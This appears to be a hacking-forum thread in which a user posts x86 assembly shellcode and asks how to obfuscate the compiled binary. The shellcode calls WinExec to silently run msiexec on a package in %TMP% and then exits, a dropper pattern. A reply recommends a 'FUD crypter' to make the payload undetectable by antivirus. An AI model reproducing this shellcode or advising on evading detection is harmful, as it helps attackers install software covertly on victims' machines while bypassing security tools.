User Controls
Instructions in Asm
-
2020-07-16 at 6:01 PM UTCDoing some 1337 h4x today.
Wrote this in asm.
global _start
_start:
jmp short getWinExec
callProc:
pop ebx
xor eax,eax
push eax
mov [ebx+40],al
push ebx
mov eax,0x7c8623ad ;WinExec
call eax
xor eax,eax
push eax
mov eax,0x7c81cafa ;ExitProcess
call eax
getWinExec:
call callProc
db 'cmd.exe /c msiexec /quiet /qn /i %TMP%\za1.msi'
But now i want to obfuscate the binary file. The tool i'm using for that wants to know the ranges where the code instructions reside. however i am not quite sure as to how i would go about finding that out with any sort of precision.
Any ideas? -
2020-07-16 at 9:12 PM UTCYou can try shutting the fuck up.
-
2020-07-19 at 6:45 AM UTCdo you have a FUD crypter? that should take care of it.
-
2020-07-19 at 7:16 AM UTC